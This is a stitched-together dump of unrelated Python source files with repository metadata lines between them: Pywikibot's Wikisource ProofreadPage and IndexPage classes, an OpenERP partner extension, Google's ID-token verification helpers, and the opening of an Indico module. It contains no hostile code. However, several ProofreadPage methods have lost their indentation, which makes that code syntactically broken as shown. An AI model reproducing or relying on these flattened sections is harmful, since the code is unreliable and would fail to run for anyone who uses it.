        r'<pagequality level="(?P<ql>\d)" user="(?P<user>.*?)" />'
        r'(?P<has_div><div class="pagetext">)?(?P<header>.*)',
        re.DOTALL)

    TEMPLATE_V1 = ('<pagequality level="{0.ql}" user="{0.user}" />'
                   '<div class="pagetext">{0.header}\n\n\n')
    TEMPLATE_V2 = ('<pagequality level="{0.ql}" user="{0.user}" />'
                   '{0.header}')

    def __init__(self, text=None):
        """Parse text into quality level, user and free header text."""
        self._text = text or ''
        self._has_div = True

        match = self.p_header.search(self._text)
        if match is None:
            # No recognizable header: fall back to an empty one.
            self.ql = ProofreadPage.NOT_PROOFREAD
            self.user = ''
            self.header = ''
        else:
            self.ql = int(match.group('ql'))
            self.user = match.group('user')
            self.header = match.group('header')
            self._has_div = bool(match.group('has_div'))

    def __str__(self):
        """Serialize back to wikitext, matching the parsed variant."""
        template = (FullHeader.TEMPLATE_V1 if self._has_div
                    else FullHeader.TEMPLATE_V2)
        return template.format(self)
class ProofreadPage(pywikibot.Page):

    """ProofreadPage page used in Mediawiki ProofreadPage extension."""

    # Quality level (QL) constants, mirroring the ProofreadPage extension.
    WITHOUT_TEXT = 0
    NOT_PROOFREAD = 1
    PROBLEMATIC = 2
    PROOFREAD = 3
    VALIDATED = 4

    # All levels in ascending order; checked against site.proofread_levels
    # in __init__.
    PROOFREAD_LEVELS = [WITHOUT_TEXT,
                        NOT_PROOFREAD,
                        PROBLEMATIC,
                        PROOFREAD,
                        VALIDATED,
                        ]

    # Page layout: <noinclude>header</noinclude>body<noinclude>footer</noinclude>.
    # The '%s' slot is filled with '</div>' or '' depending on the header
    # variant (see the _fmt property).
    _FMT = ('{0.open_tag}{0._full_header}{0.close_tag}'
            '{0._body}'
            '{0.open_tag}{0._footer}%s{0.close_tag}')

    open_tag = '<noinclude>'
    close_tag = '</noinclude>'
    p_open = re.compile(r'<noinclude>')
    p_close = re.compile(r'(</div>|\n\n\n)?</noinclude>')

    # phe-tools ocr utility
    HOCR_CMD = ('https://tools.wmflabs.org/phetools/hocr_cgi.py?'
                'cmd=hocr&book={book}&lang={lang}&user={user}')

    OCR_CMD = ('https://tools.wmflabs.org/phetools/ocr.php?'
               'cmd=ocr&url={url_image}&lang={lang}&user={user}')

    # File extensions of multi-page scan containers.
    MULTI_PAGE_EXT = ['djvu', 'pdf']
    def __init__(self, source, title=''):
        """Instantiate a ProofreadPage object.

        @param source: page source (Site or Page/Link-like object)
        @param title: page title, required when source is a Site
        @raise UnknownExtension: source Site has no ProofreadPage Extension.
        @raise ValueError: the page is not in the proofread page namespace,
            or the site's quality levels differ from PROOFREAD_LEVELS.
        """
        if not isinstance(source, pywikibot.site.BaseSite):
            site = source.site
        else:
            site = source
        super(ProofreadPage, self).__init__(source, title)
        if self.namespace() != site.proofread_page_ns:
            raise ValueError('Page %s must belong to %s namespace'
                             % (self.title(), site.proofread_page_ns))
        # Ensure that constants are in line with Extension values.
        if list(self.site.proofread_levels.keys()) != self.PROOFREAD_LEVELS:
            raise ValueError('QLs do not match site values: %s != %s'
                             % (self.site.proofread_levels.keys(),
                                self.PROOFREAD_LEVELS))
        # Cache the parsed components of the title (see _parse_title).
        self._base, self._base_ext, self._num = self._parse_title()
        self._multi_page = self._base_ext in self.MULTI_PAGE_EXT
@property
def _fmt(self):
if self._full_header._has_div:
return self._FMT % '</div>'
else:
return self._FMT % ''
def _parse_title(self):
"""Get ProofreadPage base title, base extension and page number.
Base title is the part of title before the last '/', if any,
or the whole title if no '/' is present.
Extension is the extension of the base title.
Page number is the part of title after the last '/', if any,
or None if no '/' is present.
E.g. for title 'Page:Popular Science Monthly Volume 1.djvu/12':
- base = 'Popular Science Monthly Volume 1.djvu'
- extenstion = 'djvu'
- number = 12
E.g. for title 'Page:Original Waltzing Matilda manuscript.jpg':
- base = 'Original Waltzing Matilda manuscript.jpg'
- extenstion = 'jpg'
- number = None
@return: (base, ext, num).
@rtype: tuple
"""
left, sep, right = self.title(withNamespace=False).rpartition('/')
if sep:
base = left
num = int(right)
else:
base = right
num = None
left, sep, right = base.rpartition('.')
if sep:
ext = right
else:
ext = ''
return (base, ext, num)
    @property
    def index(self):
        """Get the Index page which contains ProofreadPage.

        If there are many Index pages link to this ProofreadPage, and
        the ProofreadPage is titled Page:<index title>/<page number>,
        the Index page with the same title will be returned.
        Otherwise None is returned in the case of multiple linked Index pages.

        To force reload, delete index and call it again.

        @return: the Index page for this ProofreadPage
        @rtype: IndexPage or None
        """
        # _index caches a (selected page, other candidates) pair.
        if not hasattr(self, '_index'):
            index_ns = self.site.proofread_index_ns
            what_links_here = [IndexPage(page) for page in
                               set(self.getReferences(namespaces=index_ns))]

            if not what_links_here:
                self._index = (None, [])
            elif len(what_links_here) == 1:
                self._index = (what_links_here.pop(), [])
            else:
                self._index = (None, what_links_here)
                # Try to infer names from page titles.
                if self._num is not None:
                    for page in what_links_here:
                        if page.title(withNamespace=False) == self._base:
                            what_links_here.remove(page)
                            self._index = (page, what_links_here)
                            break

        page, others = self._index
        if others:
            # Ambiguous linkage: report all candidates and the selection.
            pywikibot.warning('%s linked to several Index pages.' % self)
            pywikibot.output('{0}{1!s}'.format(' ' * 9, [page] + others))

            if page:
                pywikibot.output('{0}Selected Index: {1}'.format(' ' * 9, page))
                pywikibot.output('{0}remaining: {1!s}'.format(' ' * 9, others))

        if not page:
            pywikibot.warning('Page %s is not linked to any Index page.'
                              % self)

        return page

    @index.setter
    def index(self, value):
        """Set the Index page; discards any cached alternatives."""
        if not isinstance(value, IndexPage):
            raise TypeError('value %s must be a IndexPage object.'
                            % value)
        self._index = (value, None)

    @index.deleter
    def index(self):
        """Drop the cache so the next access recomputes the Index page."""
        if hasattr(self, "_index"):
            del self._index
@property
def quality_level(self):
"""Return the quality level of this page when it is retrieved from API.
This is only applicable if contentmodel equals 'proofread-page'.
None is returned otherwise.
This property is read-only and is applicable only when page is loaded.
If quality level is overwritten during page processing, this property
is no longer necessarily aligned with the new value.
In this way, no text parsing is necessary to check quality level when
fetching a page.
# TODO: align this value with ProofreadPage.ql
"""
if self.content_model == 'proofread-page' and hasattr(self, '_quality'):
return self._quality
return self.ql
def decompose(fn): # flake8: disable=N805
"""Decorator.
Decompose text if needed and recompose text.
"""
def wrapper(obj, *args, **kwargs):
if not hasattr(obj, '_full_header'):
obj._decompose_page()
_res = fn(obj, *args, **kwargs)
obj._compose_page()
return _res
return wrapper
    @property
    @decompose
    def ql(self):
        """Return page quality level (one of PROOFREAD_LEVELS)."""
        return self._full_header.ql

    @ql.setter
    @decompose
    def ql(self, value):
        """Set page quality level.

        @raise ValueError: value is not a quality level known to the site.
        """
        if value not in self.site.proofread_levels:
            raise ValueError('Not valid QL value: %s (legal values: %s)'
                             % (value, self.site.proofread_levels))
        # TODO: add logic to validate ql value change, considering
        # site.proofread_levels.
        self._full_header.ql = value
    @property
    @decompose
    def user(self):
        """Return user in page header (last user to set the quality level)."""
        return self._full_header.user

    @user.setter
    @decompose
    def user(self, value):
        """Set user in page header."""
        self._full_header.user = value
@property
@decompose
def status(self):
"""Return Proofread Page status."""
try:
return self.site.proofread_levels[self.ql]
except KeyError:
pywikibot.warning('Not valid status set for %s: quality level = %s'
% (self.title(asLink=True), self.ql))
return None
    # Convenience shortcuts for assigning each quality level via the
    # validating ql setter.
    def without_text(self):
        """Set Page QL to "Without text"."""
        self.ql = self.WITHOUT_TEXT

    def problematic(self):
        """Set Page QL to "Problematic"."""
        self.ql = self.PROBLEMATIC

    def not_proofread(self):
        """Set Page QL to "Not Proofread"."""
        self.ql = self.NOT_PROOFREAD

    def proofread(self):
        """Set Page QL to "Proofread"."""
        # TODO: check should be made to be consistent with Proofread Extension
        self.ql = self.PROOFREAD

    def validate(self):
        """Set Page QL to "Validated"."""
        # TODO: check should be made to be consistent with Proofread Extension
        self.ql = self.VALIDATED
    @property
    @decompose
    def header(self):
        """Return editable part of Page header (free text after the tag)."""
        return self._full_header.header

    @header.setter
    @decompose
    def header(self, value):
        """Set editable part of Page header."""
        self._full_header.header = value
    @property
    @decompose
    def body(self):
        """Return Page body (the transcluded text between the noincludes)."""
        return self._body

    @body.setter
    @decompose
    def body(self, value):
        """Set Page body."""
        self._body = value
    @property
    @decompose
    def footer(self):
        """Return Page footer (content of the trailing noinclude block)."""
        return self._footer

    @footer.setter
    @decompose
    def footer(self, value):
        """Set Page footer."""
        self._footer = value
    def _create_empty_page(self):
        """Create empty page: blank header, body and footer, then recompose."""
        self._full_header = FullHeader()
        self._body = ''
        self._footer = ''
        self.user = self.site.username()  # Fill user field in empty header.
        self._compose_page()
    @property
    def text(self):
        """Override text property.

        Preload text returned by EditFormPreloadText to preload non-existing
        pages.
        """
        # Text is already cached.
        if hasattr(self, '_text'):
            return self._text
        if self.exists():
            # If page exists, load it.  The parent property is evaluated
            # for its side effect only: it caches the fetched text into
            # self._text.  NOTE(review): relies on Page.text caching
            # behaviour — confirm against pywikibot.Page.
            super(ProofreadPage, self).text
        else:
            # If page does not exist, preload it.
            self._text = self.preloadText()
            self.user = self.site.username()  # Fill user field in empty header.
        return self._text

    @text.setter
    def text(self, value):
        """Update current text.

        Mainly for use within the class, called by other methods.
        Use self.header, self.body and self.footer to set page content,

        @param value: New value or None
        @type value: basestring

        @raise Error: the page is not formatted according to ProofreadPage
            extension.
        """
        self._text = value
        # Empty or None text means a fresh, empty page structure.
        if self._text:
            self._decompose_page()
        else:
            self._create_empty_page()

    @text.deleter
    def text(self):
        """Delete current text."""
        if hasattr(self, '_text'):
            del self._text
    def _decompose_page(self):
        """Split Proofread Page text in header, body and footer.

        @raise Error: the page is not formatted according to ProofreadPage
            extension.
        """
        # Property force page text loading.
        if not (hasattr(self, '_text') or self.text):
            self._create_empty_page()
            return

        # Find every <noinclude> opener and closer in the text.
        open_queue = list(self.p_open.finditer(self._text))
        close_queue = list(self.p_close.finditer(self._text))

        len_oq = len(open_queue)
        len_cq = len(close_queue)
        # A valid page has at least two balanced noinclude sections
        # (header and footer).
        if (len_oq != len_cq) or (len_oq < 2 or len_cq < 2):
            raise pywikibot.Error('ProofreadPage %s: invalid format'
                                  % self.title(asLink=True))

        # Header is delimited by the first pair, footer by the last pair;
        # the body is everything in between.
        f_open, f_close = open_queue[0], close_queue[0]
        self._full_header = FullHeader(self._text[f_open.end():f_close.start()])

        l_open, l_close = open_queue[-1], close_queue[-1]
        self._footer = self._text[l_open.end():l_close.start()]

        self._body = self._text[f_close.end():l_open.start()]
    def _compose_page(self):
        """Compose Proofread Page text from header, body and footer.

        @return: the recomposed wikitext (also stored in self._text).
        """
        self._text = self._fmt.format(self)
        return self._text
def _page_to_json(self):
"""Convert page text to json format.
This is the format accepted by action=edit specifying
contentformat=application/json. This format is recommended to save the
page, as it is not subject to possible errors done in composing the
wikitext header and footer of the page or changes in the ProofreadPage
extension format.
"""
page_dict = {'header': self.header,
'body': self.body,
'footer': self.footer,
'level': {'level': self.ql, 'user': self.user},
}
# Ensure_ascii=False returns a unicode.
return json.dumps(page_dict, ensure_ascii=False)
def save(self, *args, **kwargs): # See Page.save().
"""Save page content after recomposing the page."""
summary = kwargs.pop('summary', '')
summary = self.pre_summary + summary
# Save using contentformat='application/json'.
kwargs['contentformat'] = 'application/json'
kwargs['contentmodel'] = 'proofread-page'
text = self._page_to_json()
super(ProofreadPage, self).save(*args, text=text, summary=summary,
**kwargs)
@property
def pre_summary(self):
"""Return trailing part of edit summary.
The edit summary shall be appended to pre_summary to highlight
Status in the edit summary on wiki.
"""
return '/* {0.status} */ '.format(self)
    @property
    def url_image(self):
        """Get the file url of the scan of ProofreadPage.

        The value is computed once and cached on self._url_image.

        @return: file url of the scan ProofreadPage or None.
        @rtype: str/unicode
        @raises:
        - ValueError if no prp-page-image element is found in the HTML.
        - Exception in case of http errors.
        """
        # wrong link fail with various possible Exceptions.
        if not hasattr(self, '_url_image'):
            if self.exists():
                url = self.full_url()
            else:
                # For a non-existing page, the edit (redlink) view still
                # renders the scan preview, so fetch that instead.
                path = 'w/index.php?title={0}&action=edit&redlink=1'
                url = self.site.base_url(path.format(self.title(asUrl=True)))
            try:
                response = http.fetch(url, charset='utf-8')
            except Exception:
                pywikibot.error('Error fetching HTML for %s.' % self)
                raise
            soup = Soup(response.content)
            try:
                # None if nothing is found by .find()
                self._url_image = soup.find(class_='prp-page-image')
                self._url_image = self._url_image.find('img')
                # if None raises TypeError.
                self._url_image = self._url_image['src']
            except TypeError:
                # Any of the chained lookups returned None.
                raise ValueError('No prp-page-image src found for %s.' % self)
            else:
                # src is protocol-relative; make it an absolute https url.
                self._url_image = 'https:' + self._url_image
        return self._url_image
def _ocr_callback(self, cmd_uri, parser_func=None):
"""OCR callback function.
@return: tuple (error, text [error description in case of error]).
"""
def id(x):
return x
if not cmd_uri:
raise ValueError('Parameter cmd_uri is mandatory.')
if parser_func is None:
parser_func = id
if not callable(parser_func):
raise TypeError('Keyword parser_func must be callable.')
# wrong link fail with Exceptions
try:
response = http.fetch(cmd_uri, charset='utf-8')
except Exception as e:
pywikibot.error('Querying %s: %s' % (cmd_uri, e))
return (True, e)
data = json.loads(response.content)
assert 'error' in data, 'Error from phe-tools: %s' % data
assert data['error'] in [0, 1], 'Error from phe-tools: %s' % data
error = bool(data['error'])
if error:
pywikibot.error('Querying %s: %s' % (cmd_uri, data['text']))
return (error, data['text'])
else:
return (error, parser_func(data['text']))
def _do_hocr(self):
"""Do hocr using //tools.wmflabs.org/phetools/hocr_cgi.py?cmd=hocr."""
def parse_hocr_text(txt):
"""Parse hocr text."""
soup = Soup(txt)
res = []
for ocr_page in soup.find_all(class_='ocr_page'):
for area in soup.find_all(class_='ocr_carea'):
for par in area.find_all(class_='ocr_par'):
for line in par.find_all(class_='ocr_line'):
res.append(line.get_text())
res.append('\n')
return ''.join(res)
params = {'book': self.title(asUrl=True, withNamespace=False),
'lang': self.site.lang,
'user': self.site.user(),
}
cmd_uri = self.HOCR_CMD.format(**params)
return self._ocr_callback(cmd_uri, parser_func=parse_hocr_text)
def _do_ocr(self):
"""Do ocr using //tools.wmflabs.org/phetools/ocr.pmp?cmd=ocr."""
try:
url_image = self.url_image
except ValueError:
error_text = 'No prp-page-image src found for %s.' % self
pywikibot.error(error_text)
return (True, error_text)
params = {'url_image': url_image,
'lang': self.site.lang,
'user': self.site.user(),
}
cmd_uri = self.OCR_CMD.format(**params)
return self._ocr_callback(cmd_uri)
    def ocr(self):
        """Do OCR of ProofreadPage scan.

        The text returned by this function shall be assigned to self.body,
        otherwise the ProofreadPage format will not be maintained.

        It is the user's responsibility to reset quality level accordingly.
        """
        if self._multi_page:
            # Multi-page scans (e.g. djvu): try the hocr service first.
            error, text = self._do_hocr()
            if not error:
                return text
        # Fall back to (or start with) plain OCR.
        error, text = self._do_ocr()
        if not error:
            return text
        else:
            raise ValueError('Not possible to perform HOCR/OCR on %s.' % self)
class PurgeRequest(Request):
    """Request subclass that bypasses the write-rights check.

    Workaround for T128994.
    # TODO: remove once bug is fixed.
    """
    def __init__(self, **kwargs):
        """Monkeypatch action in Request constructor."""
        real_action = kwargs['parameters']['action']
        # Construct with a harmless action so Request.__init__ does not
        # enforce write rights, then restore the real one afterwards.
        kwargs['parameters']['action'] = 'dummy'
        super(PurgeRequest, self).__init__(**kwargs)
        self.action = real_action
        self.update({'action': real_action})
class IndexPage(pywikibot.Page):
    """Index Page page used in Mediawiki ProofreadPage extension."""
    def __init__(self, source, title=''):
        """Instantiate a IndexPage object.

        In this class:
        page number is the number in the page title in the Page namespace, if
        the wikisource site adopts this convention (e.g. page_number is 12
        for Page:Popular Science Monthly Volume 1.djvu/12) or the sequential
        number of the pages linked from the index section in the Index page
        if the index is built via transclusion of a list of pages (e.g. like
        on de wikisource).
        page label is the label associated with a page in the Index page.

        This class provides methods to get pages contained in Index page,
        and relative page numbers and labels by means of several helper
        functions.
        It also provides a generator to pages contained in Index page, with
        possibility to define range, filter by quality levels and page
        existence.

        @raise UnknownExtension: source Site has no ProofreadPage Extension.
        @raise ImportError: bs4 is not installed.
        """
        # Check if BeautifulSoup is imported.
        if isinstance(BeautifulSoup, ImportError):
            raise BeautifulSoup
        if not isinstance(source, pywikibot.site.BaseSite):
            site = source.site
        else:
            site = source
        super(IndexPage, self).__init__(source, title)
        if self.namespace() != site.proofread_index_ns:
            raise ValueError('Page %s must belong to %s namespace'
                             % (self.title(), site.proofread_index_ns))
        # All Page: ns pages linked from this index, for sanity checks below.
        self._all_page_links = set(
            self.site.pagelinks(self, namespaces=site.proofread_page_ns))
        self._cached = False
    def check_if_cached(fn): # flake8: disable=N805
        """Decorator to check if data are cached and cache them if needed."""
        def wrapper(self, *args, **kwargs):
            if self._cached is False:
                self._get_page_mappings()
            return fn(self, *args, **kwargs)
        return wrapper
    def _parse_redlink(self, href):
        """Parse page title when link in Index is a redlink.

        Returns the title string or None if href does not match the
        expected edit-redlink url format.
        """
        p_href = re.compile(r'/w/index\.php\?title=(.+?)&action=edit&redlink=1')
        title = p_href.search(href)
        if title:
            return title.group(1)
        else:
            return None
    def purge(self):
        """Overwrite purge method.

        Workaround for T128994.
        # TODO: remove once bug is fixed.

        Instead of a proper purge action, use PurgeRequest, which
        skips the check on write rights.
        """
        params = {'action': 'purge', 'titles': [self.title()]}
        request = PurgeRequest(site=self.site, parameters=params)
        rawdata = request.submit()
        error_message = 'Purge action failed for %s' % self
        assert 'purge' in rawdata, error_message
        assert 'purged' in rawdata['purge'][0], error_message
    def _get_page_mappings(self):
        """Associate label and number for each page linked to the index."""
        # Clean cache, if any.
        self._page_from_numbers = {}
        self._numbers_from_page = {}
        self._page_numbers_from_label = {}
        self._pages_from_label = {}
        self._labels_from_page_number = {}
        self._labels_from_page = {}
        if hasattr(self, '_parsed_text'):
            del self._parsed_text
        self._parsed_text = self._get_parsed_page()
        self._soup = Soup(self._parsed_text)
        # Do not search for "new" here, to avoid to skip purging if links
        # to non-existing pages are present.
        attrs = {'class': re.compile('prp-pagequality')}
        # Search for attribute "prp-pagequality" in tags:
        # Existing pages:
        # <a href="/wiki/Page:xxx.djvu/n"
        #    title="Page:xxx.djvu/n">m
        #    class="quality1 prp-pagequality-1"
        # </a>
        # Non-existing pages:
        # <a href="/w/index.php?title=xxx&action=edit&redlink=1"
        #    class="new"
        #    title="Page:xxx.djvu/n (page does not exist)">m
        # </a>
        # Try to purge or raise ValueError.
        if not self._soup.find_all('a', attrs=attrs):
            self.purge()
            del self._parsed_text
            self._parsed_text = self._get_parsed_page()
            self._soup = Soup(self._parsed_text)
            if not self._soup.find_all('a', attrs=attrs):
                raise ValueError(
                    'Missing class="qualityN prp-pagequality-N" or '
                    'class="new" in: %s.'
                    % self)
        # Search for attribute "prp-pagequality" or "new" in tags:
        attrs = {'class': re.compile('prp-pagequality|new')}
        page_cnt = 0
        for a_tag in self._soup.find_all('a', attrs=attrs):
            label = a_tag.text.lstrip('0')  # Label is not converted to int.
            class_ = a_tag.get('class')
            href = a_tag.get('href')
            if 'new' in class_:
                title = self._parse_redlink(href)  # non-existing page
                if title is None:  # title not conforming to required format
                    continue
            else:
                title = a_tag.get('title')  # existing page
            try:
                page = ProofreadPage(self.site, title)
                page.index = self  # set index property for page
                page_cnt += 1
            except ValueError:
                # title is not in site.proofread_page_ns; do not consider it
                continue
            if page not in self._all_page_links:
                raise pywikibot.Error('Page %s not recognised.' % page)
            # In order to avoid to fetch other Page:title links outside
            # the Pages section of the Index page; these should hopefully be
            # the first ones, so if they start repeating, we are done.
            if page in self._labels_from_page:
                break
            # Sanity check if WS site use page convention name/number.
            if page._num is not None:
                assert page_cnt == int(page._num), (
                    'Page number %s not recognised as page %s.'
                    % (page_cnt, title))
            # Mapping: numbers <-> pages.
            self._page_from_numbers[page_cnt] = page
            self._numbers_from_page[page] = page_cnt
            # Mapping: numbers/pages as keys, labels as values.
            self._labels_from_page_number[page_cnt] = label
            self._labels_from_page[page] = label
            # Reverse mapping: labels as keys, numbers/pages as values.
            self._page_numbers_from_label.setdefault(label, set()).add(page_cnt)
            self._pages_from_label.setdefault(label, set()).add(page)
        # Sanity check: all links to Page: ns must have been considered.
        assert set(self._labels_from_page) == set(self._all_page_links)
        # Info cached.
        self._cached = True
    @property
    @check_if_cached
    def num_pages(self):
        """Return total number of pages in Index.

        @return: total number of pages in Index
        @rtype: int
        """
        return len(self._page_from_numbers)
    def page_gen(self, start=1, end=None, filter_ql=None,
                 only_existing=False, content=True):
        """Return a page generator which yields pages contained in Index page.

        Range is [start ... end], extremes included.

        @param start: first page, defaults to 1
        @type start: int
        @param end: num_pages if end is None
        @type end: int
        @param filter_ql: filters quality levels
            if None: all but 'Without Text'.
        @type filter_ql: list of ints (corresponding to ql constants
            defined in ProofreadPage).
        @param only_existing: yields only existing pages.
        @type only_existing: bool
        @param content: preload content.
        @type content: bool
        """
        if end is None:
            end = self.num_pages
        if not ((1 <= start <= self.num_pages) and
                (1 <= end <= self.num_pages) and
                (start <= end)):
            raise ValueError('start=%s, end=%s are not in valid range (%s, %s)'
                             % (start, end, 1, self.num_pages))
        # All but 'Without Text'
        if filter_ql is None:
            filter_ql = list(self.site.proofread_levels.keys())
            filter_ql.remove(ProofreadPage.WITHOUT_TEXT)
        gen = (self.get_page(i) for i in range(start, end + 1))
        if content:
            gen = self.site.preloadpages(gen)
        # Decorate and sort by page number because preloadpages does not
        # guarantee order.
        # TODO: remove if preloadpages will guarantee order.
        gen = ((p, self.get_number(p)) for p in gen)
        gen = (p[0] for p in sorted(gen, key=lambda x: x[1]))
        # Filter by QL.
        gen = (p for p in gen if p.ql in filter_ql)
        # Yield only existing.
        if only_existing:
            gen = (p for p in gen if p.exists())
        return gen
    @check_if_cached
    def get_label_from_page(self, page):
        """Return 'page label' for page.

        There is a 1-to-1 correspondence (each page has a label).

        @param page: Page instance
        @return: page label
        @rtype: unicode string
        """
        try:
            return self._labels_from_page[page]
        except KeyError:
            raise KeyError('Invalid Page: %s.' % page)
    @check_if_cached
    def get_label_from_page_number(self, page_number):
        """Return page label from page number.

        There is a 1-to-1 correspondence (each page has a label).

        @param page_number: int
        @return: page label
        @rtype: unicode string
        """
        try:
            return self._labels_from_page_number[page_number]
        except KeyError:
            raise KeyError('Page number ".../%s" not in range.'
                           % page_number)
    def _get_from_label(self, mapping_dict, label):
        """Helper function to get info from label."""
        # Convert label to string if an integer is passed.
        if isinstance(label, int):
            label = str(label)
        try:
            return mapping_dict[label]
        except KeyError:
            raise KeyError('No page has label: "%s".' % label)
    @check_if_cached
    def get_page_number_from_label(self, label='1'):
        """Return page number from page label.

        There is a 1-to-many correspondence (a label can be the same for
        several pages).

        @return: set containing page numbers corresponding to page label.
        """
        return self._get_from_label(self._page_numbers_from_label, label)
    @check_if_cached
    def get_page_from_label(self, label='1'):
        """Return page number from page label.

        There is a 1-to-many correspondence (a label can be the same for
        several pages).

        @return: set containing pages corresponding to page label.
        """
        return self._get_from_label(self._pages_from_label, label)
    @check_if_cached
    def get_page(self, page_number):
        """Return a page object from page number."""
        try:
            return self._page_from_numbers[page_number]
        except KeyError:
            raise KeyError('Invalid page number: %s.' % page_number)
    @check_if_cached
    def pages(self):
        """Return the list of pages in Index, sorted by page number.

        @return: list of pages
        @rtype: list
        """
        return [self._page_from_numbers[i] for i in range(1, self.num_pages + 1)]
    @check_if_cached
    def get_number(self, page):
        """Return a page number from page object."""
        try:
            return self._numbers_from_page[page]
        except KeyError:
            raise KeyError('Invalid page: %s.' % page)
| mit |
CloudWareChile/OpenChile | openerp/addons/event/res_partner.py | 9 | 1403 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from osv import fields, osv
class res_partner(osv.osv):
    """Extend res.partner with event-related fields (speaker flag, events)."""
    _inherit = 'res.partner'
    _columns = {
        # True when this partner can be selected as an event speaker.
        'speaker': fields.boolean('Speaker'),
        # Events where this partner is the main speaker (read-only mirror).
        'event_ids': fields.one2many('event.event','main_speaker_id', readonly=True),
        # Registrations made by this partner (read-only mirror).
        'event_registration_ids': fields.one2many('event.registration','partner_id', readonly=True),
    }
# Instantiating the class registers the model in the OpenERP ORM pool.
res_partner()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
gnmiller/craig-bot | craig-bot/lib/python3.6/site-packages/google/oauth2/id_token.py | 12 | 5590 | # Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Google ID Token helpers.
Provides support for verifying `OpenID Connect ID Tokens`_, especially ones
generated by Google infrastructure.
To parse and verify an ID Token issued by Google's OAuth 2.0 authorization
server use :func:`verify_oauth2_token`. To verify an ID Token issued by
Firebase, use :func:`verify_firebase_token`.
A general purpose ID Token verifier is available as :func:`verify_token`.
Example::
from google.oauth2 import id_token
from google.auth.transport import requests
request = requests.Request()
id_info = id_token.verify_oauth2_token(
token, request, 'my-client-id.example.com')
if id_info['iss'] != 'https://accounts.google.com':
raise ValueError('Wrong issuer.')
userid = id_info['sub']
By default, this will re-fetch certificates for each verification. Because
Google's public keys are only changed infrequently (on the order of once per
day), you may wish to take advantage of caching to reduce latency and the
potential for network errors. This can be accomplished using an external
library like `CacheControl`_ to create a cache-aware
:class:`google.auth.transport.Request`::
import cachecontrol
import google.auth.transport.requests
import requests
session = requests.session()
cached_session = cachecontrol.CacheControl(session)
request = google.auth.transport.requests.Request(session=cached_session)
.. _OpenID Connect ID Token:
http://openid.net/specs/openid-connect-core-1_0.html#IDToken
.. _CacheControl: https://cachecontrol.readthedocs.io
"""
import json
from six.moves import http_client
from google.auth import exceptions
from google.auth import jwt
# The URL that provides public certificates for verifying ID tokens issued
# by Google's OAuth 2.0 authorization server.
_GOOGLE_OAUTH2_CERTS_URL = 'https://www.googleapis.com/oauth2/v1/certs'
# The URL that provides public certificates for verifying ID tokens issued
# by Firebase and the Google APIs infrastructure.
_GOOGLE_APIS_CERTS_URL = (
    'https://www.googleapis.com/robot/v1/metadata/x509'
    '/securetoken@system.gserviceaccount.com')
def _fetch_certs(request, certs_url):
"""Fetches certificates.
Google-style cerificate endpoints return JSON in the format of
``{'key id': 'x509 certificate'}``.
Args:
request (google.auth.transport.Request): The object used to make
HTTP requests.
certs_url (str): The certificate endpoint URL.
Returns:
Mapping[str, str]: A mapping of public key ID to x.509 certificate
data.
"""
response = request(certs_url, method='GET')
if response.status != http_client.OK:
raise exceptions.TransportError(
'Could not fetch certificates at {}'.format(certs_url))
return json.loads(response.data.decode('utf-8'))
def verify_token(id_token, request, audience=None,
                 certs_url=_GOOGLE_OAUTH2_CERTS_URL):
    """Verifies an ID token and returns the decoded token.

    Args:
        id_token (Union[str, bytes]): The encoded token.
        request (google.auth.transport.Request): The object used to make
            HTTP requests.
        audience (str): The audience that this token is intended for. If None
            then the audience is not verified.
        certs_url (str): The URL that specifies the certificates to use to
            verify the token. This URL should return JSON in the format of
            ``{'key id': 'x509 certificate'}``.

    Returns:
        Mapping[str, Any]: The decoded token.
    """
    # Fetch the current public certificates, then verify signature,
    # expiry and (optionally) audience in one step.
    return jwt.decode(id_token,
                      certs=_fetch_certs(request, certs_url),
                      audience=audience)
def verify_oauth2_token(id_token, request, audience=None):
    """Verifies an ID Token issued by Google's OAuth 2.0 authorization server.

    Args:
        id_token (Union[str, bytes]): The encoded token.
        request (google.auth.transport.Request): The object used to make
            HTTP requests.
        audience (str): The audience that this token is intended for. This is
            typically your application's OAuth 2.0 client ID. If None then the
            audience is not verified.

    Returns:
        Mapping[str, Any]: The decoded token.
    """
    # Delegate to the generic verifier with the OAuth 2.0 certificate url.
    decoded = verify_token(id_token, request, audience=audience,
                           certs_url=_GOOGLE_OAUTH2_CERTS_URL)
    return decoded
def verify_firebase_token(id_token, request, audience=None):
    """Verifies an ID Token issued by Firebase Authentication.

    Args:
        id_token (Union[str, bytes]): The encoded token.
        request (google.auth.transport.Request): The object used to make
            HTTP requests.
        audience (str): The audience that this token is intended for. This is
            typically your Firebase application ID. If None then the audience
            is not verified.

    Returns:
        Mapping[str, Any]: The decoded token.
    """
    # Delegate to the generic verifier with the Firebase certificate url.
    decoded = verify_token(id_token, request, audience=audience,
                           certs_url=_GOOGLE_APIS_CERTS_URL)
    return decoded
| mit |
nop33/indico | indico/modules/events/papers/__init__.py | 2 | 4743 | # This file is part of Indico.
# Copyright (C) 2002 - 2017 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from flask import session
from indico.core import signals
